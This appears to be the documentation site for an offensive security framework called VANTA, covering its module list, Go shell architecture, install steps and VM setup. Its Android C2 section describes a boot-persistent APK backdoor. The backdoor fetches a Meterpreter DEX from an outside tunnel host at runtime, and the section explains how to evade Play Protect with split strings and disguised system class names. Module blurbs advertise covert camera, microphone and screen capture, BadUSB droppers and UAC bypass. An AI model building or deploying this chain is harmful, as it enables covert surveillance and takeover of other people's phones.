oxborn3.com / VANTA

VANTADocumentation

VANTA is a modular offensive security framework built around a Go REPL shell and Python-driven modules. Each module is a self-contained tool that receives targets and parameters over stdin and returns structured findings over stdout. The shell handles dispatch, tab-completion, session tracking, and live module reloading.

Complete Beginners Click here to start your foundation → All terminology · Prerequisites · First 10-minute guide · Module index
Install git clone https://github.com/0xb0rn3/vanta && cd vanta && bash install.sh
Complete Learning Manual - 12000+ lines
VANTA Complete Manual v0.0.1 - All Foundations, Languages, Hardware, AI/LLM, Tools
CPU internals - x86 ASM - buffer overflows - Python/Bash/Go/C/PowerShell/JS/PHP - hardware - USB/HID - ARM/Android/iOS - steganography - fuzzing - pentest toolchain - LLM security - CTF prep
01 Current Project

VANTA Modules

Stable
netrecon
Network · Recon
Multi-engine network reconnaissance. Combines nmap, masscan, rustscan with host profiling, CVE mapping, IoT device detection, MQTT/RTSP probing, ICS/SCADA identification, and geolocation.
nmapmasscanrustscaniotcvegeo
Stable
android_pentest
Mobile · Android
Complete Android pentest suite — 39 operations across static analysis, smali patching, boot receiver persistence, WAN C2 with DexClassLoader staging, Frida/Objection instrumentation, QR delivery, live screen mirror, camera stream, mic recording, and a full web GUI (mode=gui) including the C2 dashboard and Live Media tab
adbapktooldexclassloaderborefridaqrlive-media
Stable
iot_pwn
Network · IoT
IoT and router exploitation module. Tests default credentials across SSH, Telnet, FTP, and HTTP admin panels. SNMP community brute-force, UPnP SSDP exposure detection, RTSP no-auth checks, and known router CVE probing (Huawei, Zyxel, Arcadyan, D-Link).
iotrouterdefault-credssnmprtspcve
Docs Soon
ios_pentest
Mobile · iOS
iOS security testing via libimobiledevice and Frida. IPA static analysis, binary protection checks, ATS audit, SSL bypass, keychain dumping, and live CVE assessment via NVD.
ideviceinfolibimobiledevicefridaipacve
Stable
mac_spoof
Network · Anonymity
Per-interface MAC address rotation with active connection tracking. Smart, session, periodic, and aggressive rotation modes. Graceful DHCP renewal and state persistence.
macspoofinganonymitynetwork
Beta
wifi_monitor
Network · Wireless
Passive WiFi network monitor. Discovers hosts, fingerprints device types (IoT cameras, routers, NAS, databases), detects exposed services, maps CVEs, and exports structured JSON reports.
wifiarpfingerprintiotcve
Stable
adsec
Network · Active Directory
Linux-side Active Directory pentest module. Unauthenticated discovery, LDAP enum, Kerberoasting, AS-REP roasting, BloodHound collection, secretsdump, lockout-aware spraying, and a safe auto-pipeline.
ldapkerberoastasreproastbloodhoundimpacketnxc
Stable
winadsec
Windows · Active Directory
Full-chain Windows Active Directory pentest and post-exploitation. Unauthenticated discovery through UAC bypass, WMI persistence, Sliver C2 session management, and end-to-end ISO payload delivery generation.
adsliverwmiuac-bypassisoc2
Stable
websec
Web · Offensive
Full-stack web attack surface tool. DNS/WHOIS/SSL OSINT, security headers, CORS, cookies, directory brute-force, SQLi (error + time-blind), XSS, CSRF, 403 bypass, open redirect, framework CVEs (Jira/AEM/Confluence), WAF fingerprinting, web spidering, and Google dorks. PHP payload generation, msfvenom web payloads, fuzzing, and Burp Suite export.
osintsqlixsscsrf403bypasscvewaffuzzing
Stable
ctfpwn
CTF · Autopwn
Syncs github.com/0xb0rn3/CTFs, lists all rooms sorted newest first, runs standalone autopwn scripts against a target, auto-extracts flags (THM{}/HTB{}), and saves run logs to ~/ZX01C/CTF/. Tracks new rooms between pulls.
ctftryhackmehacktheboxautopwnflags
Stable
revshell
Network · C2
Multi-mode reverse shell generator and live handler. Generates payloads for bash, Python, PowerShell, netcat, PHP, and 30+ other types. Auto-starts listener on configured port. Includes msfvenom wrapper for staged and stageless Meterpreter payloads across all platforms.
shelllistenermsfvenompowershellpayload
Stable
badusb
Hardware · USB
BadUSB attack payload generator and deployer. Generates DuckyScript and HID payloads for USB Rubber Ducky, Digispark, and Teensy boards. Produces Windows PowerShell droppers, Linux persistence oneliners, and macOS payloads. Supports staged delivery via HTTP server.
hidduckyscriptrubber-duckydigisparkusb
Stable
bitlocker
Hardware · Physical
Full-chain BitLocker bypass module. USB deploy, YellowKey attack, BitPixie (CVE-2023-21563), cold boot memory extraction, TPM LPC bus sniffing, DMA via PCILeech, AD recovery key extraction, and Eclipse chain payload generation. Physical access exploitation suite.
bitlockertpmdmacold-bootpcileechcve-2023-21563
02 How It Works

Architecture

VANTA is split into two layers: a Go REPL shell that handles all user interaction, and Python (or Bash) modules that do the actual work. The shell never embeds tool-specific logic — it only knows how to load modules, manage parameters, and route stdin/stdout. This keeps the binary small (~4 MB) and makes adding new modules as simple as dropping a Python file into the right directory.

User
Terminal
REPL commands
tab-completion
param editing
Binary
VANTA (Go)
command parser
module loader
session tracker
Protocol
stdin JSON
{"target":"…"
"params":{…}}
Module
Python script
reads stdin
runs operations
writes JSON out
Output
findings JSON
{"findings":[…]
"errors":[…]
"logs":[…]}
01
Module Discovery
At startup the shell walks tools/ and loads every module.json it finds. Each JSON file declares the module's name, description, entry-point binary, accepted parameters, and required dependencies. The shell never executes anything until run is called.
02
Parameter Model
Every value the user sets with set is stored in the shell's in-memory param map. When run is called the shell serialises the map plus the target into a single JSON object and writes it to the module's stdin.
03
Output Contract
Modules write UTF-8 lines to stdout. Lines starting with FINDING: are parsed as JSON findings. Lines starting with LOG: become log entries. Everything else streams directly to the terminal as progress output.
04
Session Tracking
The shell maintains a live session registry. Meterpreter sessions opened through android_pentest are tracked by PID and metadata. Use sessions list, sessions interact <id>, or sessions kill <id>.

Directory Layout

The repository follows a consistent structure. The Go shell binary lives at the root. All modules live under tools/, grouped by category. Each module folder contains a module.json and one or more Python scripts.

VANTA/
├── VANTA                       # compiled Go REPL binary
├── main.go                    # shell source - REPL loop, command parser, module loader
├── install.sh                 # multi-distro dependency installer (pacman/apt/dnf/zypper/apk)
├── rqm.md                     # global requirements manifest — all modules, all distros
├── update.py                  # git pull + rebuild + sync_tools()
├── gen_module.py              # scaffold a new module interactively
├── tools/
│   ├── network/
│   │   ├── netrecon/          # multi-engine network recon
│   │   │   ├── module.json
│   │   │   └── netrecon.py
│   │   ├── mac_spoof/         # per-interface MAC rotation
│   │   └── wifi_monitor/      # passive WiFi host discovery
│   ├── mobile/
│   │   ├── android/           # APK backdoor + WAN C2 + Frida
│   │   │   ├── module.json
│   │   │   ├── android_pentest.py
│   │   │   ├── apk_backdoor/
│   │   │   │   ├── build_bootbuddy.py
│   │   │   │   ├── AgentService.smali
│   │   │   │   └── output/
│   │   │   └── c2_persistence/
│   │   │       ├── c2_watchdog.sh
│   │   │       └── vanta-c2.service
│   │   └── ios/               # iOS pentest via libimobiledevice + Frida
│   │       ├── module.json
│   │       └── ios_pentest.py
│   ├── web/
│   │   └── websec/            # full-stack web attack surface
│   ├── AD/
│   │   ├── linux/             # adsec — Linux-side AD pentest (15 ops)
│   │   │   ├── module.json
│   │   │   └── adsec.py
│   │   └── windows/           # winadsec — Windows AD post-exploitation (37 ops)
│   │       ├── module.json   # inputs + operations schema
│   │       └── winadsec.py
│   └── ctf/
│       └── ctfpwn.py          # CTF autopwn + flag extraction
03 Code Deep Dive

Internals

This section explains how the key pieces of VANTA work at the code level. It is intended for people who want to understand, extend, or audit the framework — not just use it.

The REPL Loop (main.go)

The shell is a standard Go read-eval-print loop. On each iteration it prints a prompt, reads a line, tokenises it, and dispatches to a handler. The prompt is built dynamically: it shows the loaded module name and count of currently-set parameters so you always know your context at a glance.

// Simplified prompt construction - actual code in main.go
func buildPrompt(mod *Module, params map[string]string) string {
    if mod == nil {
        return "vanta ❯ "
    }
    op := params["operation"]
    n  := len(params)
    if op != "" {
        return fmt.Sprintf("VANTA %s › %s [%d params] ❯ ", mod.Name, op, n)
    }
    return fmt.Sprintf("VANTA %s ❯ ", mod.Name)
}

Module Loading (module.json)

Every module directory contains a module.json that the shell reads at startup (and on reload). The JSON defines everything the shell needs to know about the module — no code is executed at load time.

// Example module.json (android_pentest, abbreviated)
{
  "name":        "android_pentest",
  "version":     "1.0.0",
  "category":   "mobile",
  "description": "Complete Android penetration testing suite",
  "author":      "VANTA Team | 0xb0rn3",
  "executable":  "python3 android_pentest.py",
  "dependencies": ["python3", "adb"],
  "inputs": {
    "operation": {
      "type":     "string",
      "required": false,
      "default":  "recon",
      "description": "Operation: recon, app_scan, vuln_scan, rebuild, full_pwn ..."
    },
    "package": {
      "type":     "string",
      "required": false,
      "description": "Target package name for app-specific operations"
    }
  }
}

The stdin/stdout Protocol

Shell → Module (stdin)
{
  "target": "192.168.1.1",
  "params": {
    "operation": "recon",
    "mode":      "deep",
    "threads":   "30"
  }
}
Module → Shell (stdout)
# Progress → terminal
[*] Scanning 192.168.1.1...
[+] Port 22 open - OpenSSH 8.9

# Findings → parsed by shell
FINDING: {"category":"open_port",
          "port":22,"service":"ssh"}

# Logs → stored in session
LOG: scan completed in 4.2s

How a Python Module Receives Data

import json, sys

# Read the shell's dispatch payload
data   = json.loads(sys.stdin.readline())
target = data.get("target", "")
params = data.get("params", {})
op     = params.get("operation", "recon")

# Dispatch table
ops = {
    "recon":           self._recon_operation,
    "static_analysis": self._static_analysis_operation,
    "backdoor_apk":    self._backdoor_apk_operation,
}

handler = ops.get(op)
if handler:
    handler()

# Emit all collected findings
for f in self.findings:
    print(f"FINDING: {json.dumps(f)}")
04 Android C2

C2 Stack &
APK Persistence

The Android persistence chain is the most technically complex part of VANTA. It uses several layered techniques to achieve boot-persistent Meterpreter sessions over WAN without embedding any detectable payload statically in the APK.

Design goal: The rebuilt APK must pass Play Protect static analysis, survive a device reboot, fetch the real Meterpreter payload from a WAN endpoint without storing it on disk permanently, and open a session through carrier NAT.

The Four-Layer Chain

01
Boot Persistence → BOOT_COMPLETED receiver
The boot persistence APK is patched by build_bootbuddy.py. The BootReceiver.onReceive() smali is modified to call startForegroundService(AgentService) immediately on BOOT_COMPLETED. A foreground service is necessary from API 26+ because background service starts from broadcast receivers are blocked.
02
AgentService → foreground service context
AgentService.smali is injected into the APK. Its onStartCommand() creates a notification channel, calls startForeground() to satisfy API 28+ requirements, then invokes BootReceiver.launchAgent() and Payload.start(context) in a daemon thread.
03
DexClassLoader Payload → runtime DEX fetch
com.android.system.health.Payload opens a URL connection to http://bore.pub:21062/s.dex, writes bytes to getCodeCacheDir()/s.dex, loads it with DexClassLoader, and calls com.metasploit.stage.Payload.start(context) via reflection. On failure it sleeps 5s and retries indefinitely.
04
s.dex → reverse_http Meterpreter via bore tunnel
s.dex is generated by msfvenom -p android/meterpreter/reverse_http targeting bore.pub:37993. reverse_http survives carrier NAT and DPI more reliably on mobile networks than reverse_tcp.

c2_watchdog.sh — The Stack Manager

HTTP
DEX file server
python3 -m http.server 8080 serving the output/ directory. Serves both s.dex and rebuilt.apk.
BORE
DEX bore tunnel
bore local 8080 --to bore.pub --port 21062 — the device's DexClassLoader fetches s.dex through this URL.
BORE
MSF bore tunnel
bore local 4444 --to bore.pub --port 37993 — the Meterpreter in s.dex calls back through this tunnel.
MSF
msfconsole handler
msfconsole -q -r handler.rc running multi/handler on 0.0.0.0:4444 with payload android/meterpreter/reverse_http.
# Start the full C2 stack
bash tools/mobile/android/c2_persistence/c2_watchdog.sh \
  --bore-dex-port 21062 \
  --bore-msf-port 37993 \
  --msf-port      4444  \
  --dex-dir       tools/mobile/android/apk_backdoor/output/ \
  --notify

# Or as a systemd service
sudo systemctl enable --now vanta-c2
sudo journalctl -u vanta-c2 -f

Play Protect Evasion

A
No static Meterpreter in APK
The APK contains only the DexClassLoader fetcher. Play Protect's static DEX scanner finds nothing to flag because there are no Metasploit signatures in the installed package. The real payload is fetched at runtime to getCodeCacheDir() which is not scanned during boot.
B
URL split across two string constants
The smali for the DEX fetch URL is const-string v0, "http://bore" + const-string v1, ".pub:21062/s.dex" concatenated at runtime, defeating single-string-constant matching scanners.
C
ProcessBuilder + split command string
Uses ProcessBuilder (less heuristically flagged than Runtime.exec()) and splits the shell command string at the midpoint, concatenated at runtime via String.concat().
D
Disguised class names
DexClassLoader class placed at com.android.system.health.Payload. AgentService embedded in the boot persistence APK at com.android.system.health.AgentService.
05 Shell Reference

VANTA Shell

Module Commands v0.0.1 k4ng
v0.0.1 k4ng Features
setg <param> <value>Set a global parameter that persists across all module switches for the session
unsetg <param>Clear a global parameter. show global lists all active globals.
run (no target)Bare run reuses the last target automatically - no need to retype the IP
optionsShortcut for show options
modulesShortcut for show modules
Loading Modules
use <module>Load a module by name. Tab completes module names from the tools/ discovery scan.
backUnload the current module and clear params. Equivalent to cd ..
reloadRescan the tools directory for new or updated modules without restarting
Configuration
set <param> <value>Set a module parameter. Values with spaces do not need quotes. e.g. set operation backdoor_apk
unset <param>Clear a single parameter
show optionsList all parameters: name, type, required flag, current value, and help text
Execution
run <target>Execute the loaded module. Target is an IP, hostname, device serial, domain, or keyword (connected, device)
Information
show modulesList all available modules grouped by category
info [module]Module details, version, author, dependency status, and example commands
search <keyword>Search modules by name, description, category, or tag
sessions [list|interact <id>|kill <id>]Manage active Meterpreter / shell sessions opened through android_pentest
Maintenance
updatePull the latest version from git — rebuilds binary, syncs tool permissions
clearClear the terminal screen
exit / quitExit VANTA
Linux Navigation native passthrough

All standard Linux commands work natively inside VANTA. The shell passes unknown commands through to the OS via exec.Command.

Directory Navigation
cd <dir>Change working directory
cd .. / cd ../Go up one level. If a module is loaded, acts as back
pwdPrint current working directory
File Operations
ls [path]List directory contents
ll / laLong listing with hidden files
mv / cp / rmMove, copy, or delete files
Viewing & Search
cat / lessPrint or page file contents
grep "<pattern>" <file>Search file contents
find <path> -name "…"Find files by name or pattern
Prompt Reference 
# No module loaded
VANTA# Module loaded, no params set
VANTA android_pentest# Module loaded, operation set, 3 params
VANTA android_pentestrebuild [3 params] ❯

# Scan in progress
VANTA netreconfull [3 params] ❯
06 Getting Started

Quickstart

01
Install VANTA
Clone the repo and run the install script. It detects your distro, installs missing dependencies, compiles the Go binary, and makes all module scripts executable.
git clone https://github.com/0xb0rn3/vanta
cd VANTA
bash install.sh
02
Launch the shell
Run the VANTA binary. It auto-scans tools/ and loads all modules with tab-completion.
./vanta     # from repo directory
VANTA       # if installed system-wide
03
Network recon
Scan a subnet, enumerate hosts, map open ports, detect device types, and pull live CVEs from NVD.
use netrecon
set mode deep
set threads 30
run 192.168.1.0/24
04
Android WAN C2 (boot persistence)
Patch boot persistence APK, generate s.dex, get QR for delivery. Device connects back on every reboot via bore tunnels.
use android_pentest
set operation rebuild
set msf true
set msf_lport 4444
run device     # builds APK + s.dex + QR

# Start C2 stack
bash tools/mobile/android/c2_persistence/c2_watchdog.sh \
  --bore-dex-port 21062 --bore-msf-port 37993 \
  --msf-port 4444 --dex-dir tools/mobile/android/apk_backdoor/output/ --notify
05
WiFi network monitoring
Discover all hosts on a WiFi segment, fingerprint device categories, detect exposed threats like Telnet, FTP, or Redis.
use wifi_monitor
set mode full
set interface wlan0
run 192.168.1.0/24
06
Navigate like Linux
Use back or cd .. to unload a module. Regular Linux commands work directly.
ls tools/network/
cat tools/network/netrecon/module.json
back
python3 update.py --sync-tools
07 Zero to Exploit

Foundations

VANTA is a command-line security framework. If you are new to terminals, shells, or what these tools do under the hood — this section builds the mental model. Experienced readers can skip to Quickstart.

01
Terminal
The window that accepts your text and shows output. xterm, Alacritty, Windows Terminal, and the VS Code integrated terminal are all terminals. When you run VANTA you are inside one.
02
Shell
The program running inside the terminal. It reads commands, finds the right binary, runs it, and shows output. bash and zsh are shells. VANTA is also a shell — a specialised one for security operations with its own REPL loop.
03
Binary / Executable
A compiled program stored as a file on disk. When you run ./vanta the OS loads that file into RAM and executes it. The VANTA binary is written in Go and compiles to ~4 MB.
04
stdin / stdout
Every running process has three default streams: stdin (input), stdout (normal output), stderr (errors). VANTA uses stdin to send parameters to modules and reads their findings back over stdout.
05
JSON
JavaScript Object Notation — a human-readable data format: {"key": "value"}. VANTA sends a JSON object to each module's stdin and expects JSON findings back. Not tied to JavaScript — every language reads and writes it.
06
Ports
A numbered endpoint on a network interface (0–65535). Servers listen on specific ports: SSH on 22, HTTP on 80, HTTPS on 443. When VANTA scans a target it probes which ports are open and what service is behind each one.
07
Dependencies
External tools a module needs. android_pentest depends on adb, apktool, and metasploit-framework. The shell checks each with which at load time and warns before you run an operation that needs a missing tool.
08
Security Module
In VANTA, a module is a Python (or Bash) script that implements one category of attack or analysis. It reads a JSON target and parameters from stdin, runs tools like nmap or adb, and writes structured findings back to stdout.

Common Ports Quick Reference

Infrastructure Services
22SSHSecure remote shell
23TelnetUnencrypted remote shell
21FTPFile transfer (plain)
25SMTPEmail sending
53DNSName resolution
161SNMPDevice management (UDP)
Web & Directory Services
80HTTPWeb (unencrypted)
443HTTPSWeb (TLS)
389LDAPActive Directory queries
636LDAPSLDAP over TLS
445SMBWindows file sharing
88KerberosAD authentication tickets

What Happens When You Run a Module

01
You type: use android_pentest → set operation recon → run 192.168.1.5
The VANTA shell reads three commands. use loads the module manifest from tools/mobile/android/module.json. set stores "operation=recon" in an in-memory map. run begins execution.
02
Shell serialises parameters to one JSON line
Builds: {"target":"192.168.1.5","params":{"operation":"recon"}} and writes it to the module process's stdin pipe. The module reads exactly one line and blocks until it arrives.
03
Module receives JSON and dispatches
android_pentest.py parses the line, extracts operation="recon", calls the corresponding function, and runs adb devices and other recon tools — printing progress to stdout as it goes.
04
Shell streams output and collects findings
Plain progress lines print directly to your terminal. Lines prefixed FINDING: are parsed as structured JSON and stored in the session. When the module exits the shell shows a finding count summary.
08 For Developers

Build a Module

VANTA modules are Python scripts (Bash and Go work too) dropped into tools/ alongside a module.json manifest. No shell modifications are needed. Drop the files in, type reload inside VANTA, and the module appears in tab-completion.

Minimum File Layout

tools/
└── network/
    └── portcheck/               # new module folder
        ├── module.json            # manifest (required)
        └── portcheck.py            # entry-point script

module.json — Full Specification

{
  "name":        "portcheck",          // unique module ID — matches folder name
  "version":     "1.0.0",              // semver
  "category":   "network",             // folder category used for grouping
  "description": "Check if a TCP port is open",
  "author":      "you",
  "executable":  "python3 portcheck.py", // command the shell spawns
  "dependencies": ["python3"],           // checked with `which` at load time
  "optional_dependencies": {            // hints shown — not required to load
    "nmap": "pacman -S nmap"
  },
  "timeout": 120,                       // seconds before shell kills process
  "inputs": {
    "port": {
      "type":        "string",            // string | int | bool | choice
      "required":    true,
      "description": "TCP port to check"
    },
    "timeout_sec": {
      "type":        "int",
      "required":    false,
      "default":     "5",
      "description": "Connection timeout in seconds"
    }
  }
}

Complete Python Module Example

A complete, working portcheck module. The only required pattern: read one JSON line from stdin on startup, dispatch on params, print progress to stdout, prefix structured results with FINDING:.

#!/usr/bin/env python3
import json, sys, socket

# ── Read dispatch payload from shell ──────────────────────────────
data   = json.loads(sys.stdin.readline())
target = data.get("target", "")
params = data.get("params", {})
port   = int(params.get("port", 80))
t_sec  = int(params.get("timeout_sec", 5))

# ── Progress lines stream directly to terminal ────────────────────
print(f"[*] Checking {target}:{port} (timeout={t_sec}s)", flush=True)

try:
    s = socket.create_connection((target, port), timeout=t_sec)
    s.close()
    status = "open"
    print(f"[+] Port {port} is OPEN", flush=True)
except (socket.timeout, ConnectionRefusedError):
    status = "closed"
    print(f"[-] Port {port} is CLOSED", flush=True)
except Exception as e:
    status = "error"
    print(f"[!] Error: {e}", flush=True)

# ── FINDING lines are parsed by the shell into session ────────────
print(f"FINDING: {json.dumps({'host': target, 'port': port, 'status': status})}")
print(f"LOG: portcheck completed for {target}:{port}")

Bash Module Example

#!/usr/bin/env bash
# Read and parse the JSON dispatch payload with jq
PAYLOAD=$(cat)
TARGET=$(echo "$PAYLOAD" | jq -r '.target')
PORT=$(echo   "$PAYLOAD" | jq -r '.params.port // "80"')

echo "[*] Checking $TARGET:$PORT"

if timeout 5 bash -c "echo > /dev/tcp/$TARGET/$PORT" 2>/dev/null; then
  STATUS="open"; echo "[+] Port $PORT OPEN"
else
  STATUS="closed"; echo "[-] Port $PORT CLOSED"
fi

echo "FINDING: $(jq -n --arg h "$TARGET" --arg p "$PORT" --arg s "$STATUS" \
  '{host:$h,port:$p,status:$s}')"

Bare Metal OS Setup

VANTA runs directly on the metal — no containers, no VMs, no abstraction layers. The Go binary and Python modules call real system tools (adb, nmap, msfconsole, bore) that must be present on the host. This section is the authoritative installation reference for every supported platform.

Minimum Hardware Requirements

CPU
x86_64 or ARM64
Any modern 64-bit processor. ARM64 (Apple Silicon, Raspberry Pi 5, phone boards) is supported — build from source. No minimum clock speed; scan performance scales linearly with core count.
RAM
4 GB minimum · 8 GB recommended
Metasploit Framework alone requires ~1 GB at rest. Running concurrent netrecon + android_pentest + msfconsole comfortably needs 6–8 GB. 4 GB is the hard floor for basic usage.
DISK
20 GB free
Metasploit + apktool + Go toolchain + module outputs account for ~12 GB. Leave 8 GB headroom for APK builds, scan logs, DEX files, and captured media from android_pentest.
NET
Ethernet + Wi-Fi adapter
wifi_monitor requires a wireless adapter that supports monitor mode and packet injection. Most Alfa adapters (AWUS036ACH, AWUS036NHA) work out of the box. Internal adapters rarely support monitor mode on laptops.
USB
USB 2.0 or higher
Android pentest requires a physical USB port for ADB. badusb payload deployment requires a USB port for the HID device (Rubber Ducky, Digispark). Do not run android_pentest through a passive USB hub.
OS
Linux only
Arch Linux / CachyOS (primary), Kali Linux (secondary), Debian/Ubuntu, Fedora, and Alpine. macOS partial (no wifi_monitor, no udev). Windows is not supported. WSL2 lacks ADB passthrough — use bare metal.

System Package Installation

Install all required system packages before running install.sh. The install script detects your package manager and runs the correct command automatically — but if you prefer to install manually, use the table below. All packages must be system-wide; do not use user-local or sandboxed installations.

Arch Linux / CachyOS / Manjaro
sudo pacman -Syu
sudo pacman -S \
  go python python-pip git \
  android-tools apktool \
  nmap masscan jq bore \
  aircrack-ng iw wireless_tools \
  metasploit frida \
  imagemagick ffmpeg \
  impacket netexec bloodhound \
  python-ldap3 python-requests \
  python-paramiko python-scapy
Kali Linux / Debian / Ubuntu
sudo apt update && sudo apt install -y \
  golang-go python3 python3-pip git \
  adb apktool default-jdk \
  nmap masscan jq \
  aircrack-ng iw wireless-tools \
  metasploit-framework \
  frida-tools \
  imagemagick ffmpeg \
  impacket-scripts netexec \
  python3-ldap3 python3-requests \
  python3-paramiko python3-scapy
pip3 install frida-tools --break-system-packages

Go Toolchain and Binary Compilation

VANTA's shell is written in Go and must be compiled from source. The Go toolchain version must be 1.21 or higher. If your distro ships an older Go, install directly from go.dev.

# Verify Go version (need 1.21+)
go version

# Clone and build
git clone https://github.com/0xb0rn3/vanta
cd VANTA
go build -o vanta main.go

# Make available system-wide (optional)
sudo cp VANTA /usr/local/bin/vanta
sudo chmod +x /usr/local/bin/vanta

ADB and Android USB Permissions

ADB requires a udev rule so Linux grants your user access to Android USB devices without root. Without this rule, adb devices returns an empty list even when the device is plugged in with USB debugging enabled.

# Write the udev rule (covers all Android vendor IDs)
sudo tee /etc/udev/rules.d/51-android.rules <<'EOF'
SUBSYSTEM=="usb", ATTR{idVendor}=="18d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="04e8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="22b8", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="0bb4", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="12d1", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="2717", MODE="0666", GROUP="plugdev"
SUBSYSTEM=="usb", ATTR{idVendor}=="1004", MODE="0666", GROUP="plugdev"
EOF

sudo chmod a+r /etc/udev/rules.d/51-android.rules
sudo udevadm control --reload-rules
sudo udevadm trigger

# Add your user to plugdev group (logout/login to take effect)
sudo usermod -aG plugdev $USER

Wireless Adapter — Monitor Mode Setup

wifi_monitor requires the wireless interface to be placed in monitor mode before running. Most distros block monitor mode by default via NetworkManager. Kill interfering processes first.

# Identify your wireless interface name
ip link show                    # look for wlan0, wlp3s0, wlan1, etc.

# Kill processes that fight for the interface
sudo airmon-ng check kill

# Put the adapter into monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

# Verify monitor mode is active
iw dev wlan0 info | grep type   # should print: type monitor

# Restore managed mode after testing
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 up
sudo systemctl restart NetworkManager

Bore — NAT Bypass Tunnel

android_pentest WAN mode requires bore to punch through carrier NAT. Bore is a Rust binary — install via cargo or download the pre-built release.

# Option A — cargo (Rust must be installed)
cargo install bore-cli

# Option B — pre-built binary (Arch AUR)
yay -S bore-cli

# Option C — direct binary download
curl -L https://github.com/ekzhang/bore/releases/latest/download/bore-x86_64-unknown-linux-musl.tar.gz \
  | tar xz
sudo mv bore /usr/local/bin/bore

# Verify
bore --version

Metasploit Framework

MSF must be initialised before VANTA can use it. Run the database setup once after installation. VANTA starts msfconsole as a subprocess and communicates via RC files — it does not use the RPC API.

# Arch
sudo pacman -S metasploit

# Kali / Debian (already included in Kali)
sudo apt install metasploit-framework

# One-time database initialisation
sudo msfdb init

# Verify MSF starts clean (Ctrl+C to exit)
msfconsole -q -x "version; exit"

install.sh — What It Actually Does

01
Detects package manager
Checks for pacman, apt, dnf, zypper, and apk in order. Runs the appropriate install command for the full dependency list in rqm.md.
02
Compiles the Go binary
Runs go build -o vanta main.go. If Go is not found it exits with a clear error message rather than trying to install Go itself — Go must be on PATH before running install.sh.
03
Sets executable permissions on all module scripts
chmod +x is applied recursively to every .py and .sh file under tools/. Without this, the shell cannot spawn module processes.
04
Writes the udev rule for ADB
Creates /etc/udev/rules.d/51-android.rules with major Android vendor IDs if it does not already exist, then reloads udev. Requires sudo — the script will prompt for the password.
05
Runs dependency verification
Iterates every module.json in the repo, checks each dependency with which, and prints a per-module table: ✓ Found / ✗ Missing. Any Missing entry means that module's dependent operations will fail at runtime.

Testing Your Module — Bare Metal Integration

All testing is done against real system tools on the live machine. There are no mocks, no stubs, no sandboxes. If a command works in the terminal it should work through VANTA — if it does not, the issue is in the JSON dispatch, the executable path, or a missing dependency.

01
Pipe test directly — no VANTA required
From the module folder: echo '{"target":"127.0.0.1","params":{"port":"22"}}' | python3 portcheck.py. If output looks correct here, the module works. Bugs showing only through VANTA are dispatch bugs, not logic bugs.
02
Verify all deps pass inside VANTA
Launch VANTA, then: info portcheck. Every entry in the manifest's dependencies array must show ✓ Found. ✗ Missing means the binary is not on PATH — install it or add it to optional_dependencies if it is truly optional.
03
Live reload cycle
Edit the module file, then inside VANTA run reloaduse portcheckset port 22run 127.0.0.1. Confirm FINDING lines appear and no Python traceback hits stdout (tracebacks break JSON parsing).
04
Cross-module regression check
After adding or changing a module, run an unrelated module (use netreconrun 127.0.0.1) to confirm the reload did not corrupt the module registry. All previously-working modules must still load cleanly.
05
Scaffold with gen_module.py
python3 gen_module.py asks a series of questions and generates both module.json and a starter Python file with the stdin read, dispatch table, and FINDING pattern already in place.

System Health Check — Run This Before Every Session

# ADB — device must appear here before any android_pentest op
adb devices

# Network interfaces — confirm monitor-mode adapter is visible
ip link show
iw dev

# Metasploit DB — must be running for MSF-backed operations
sudo msfdb status

# Bore — confirm the binary is on PATH
bore --version

# VANTA dependency table for all modules
./vanta -check-deps        # prints ✓/✗ for every module's full dep list

# Quick smoke test — localhost recon, should complete in under 5s
echo '{"target":"127.0.0.1","params":{"mode":"quick"}}' \
  | python3 tools/network/netrecon/netrecon.py
PR checklist: module.json validates · dependencies array complete · FINDING: prefix on all structured output · no hardcoded absolute paths · pipe test passes on clean system · info <module> shows all deps as Found · no tracebacks reach stdout · PR title: feat(module): add <name> — <one-line desc>
09 Isolated Lab Environment

VM Setup

A virtual machine gives you a reproducible, snapshot-able VANTA environment isolated from your daily driver. Break it, snapshot it, clone it per engagement. This section builds each supported OS from ISO to a running VANTA install — start to finish, no assumed knowledge.

Bare metal vs VM: Bare metal gives full hardware access — real USB for ADB, physical Wi-Fi card for monitor mode. A VM is better for sandboxed development, repeatable lab builds, and contributors who cannot dedicate a machine. For active Android pentest or wifi_monitor work, prefer bare metal or USB passthrough.

VM Specification — All Distros

CPU
4 virtual cores
Minimum 2 vCPUs. 4 recommended — MSF handler, bore tunnel, python module, and the VANTA shell all compete for CPU during a live engagement.
RAM
8 GB
Hard floor is 4 GB. Metasploit Framework uses ~1 GB at rest. Running android_pentest GUI + msfconsole + bore simultaneously needs 6–8 GB to avoid swap thrash.
DISK
40 GB, thin provision
Use thin/dynamic allocation so the image only occupies actual data on the host. APK builds, DEX files, scan logs, and captured media can grow fast — leave headroom.
NET
Bridged adapter
Bridged gives the VM a real LAN IP visible to target devices. NAT works for internet-only but blocks ADB-over-network and bore tunnel callbacks. Use bridged for any live testing.
USB
USB 3.0 passthrough
For ADB: enable USB 3.0 controller and add a USB filter for your phone's vendor ID in VirtualBox, or use virt-manager device passthrough in QEMU/KVM. Without passthrough, adb devices sees nothing.
BOOT
UEFI
Enable EFI/UEFI in the VM firmware settings. All modern ISO installers expect it. BIOS legacy mode works but produces a different partition layout — the guides below assume UEFI.

Hypervisor — QEMU/KVM vs VirtualBox

QEMU/KVM — Recommended on Linux hosts
Native Linux hypervisor. Near-bare-metal performance via KVM acceleration. USB passthrough via virt-manager device wizard. Snapshots via virsh snapshot-create. Best choice if your host is Linux. 
sudo pacman -S qemu-full virt-manager libvirt dnsmasq
sudo systemctl enable --now libvirtd
sudo usermod -aG libvirt,kvm $USER
VirtualBox — Cross-platform alternative
Works on Linux, macOS, and Windows hosts. GUI-driven setup. USB passthrough requires the VirtualBox Extension Pack (free for personal use). Snapshots via Machine → Take Snapshot. 
# Arch host
sudo pacman -S virtualbox virtualbox-host-modules-arch
sudo modprobe vboxdrv
sudo usermod -aG vboxusers $USER

Arch Linux — Primary Platform

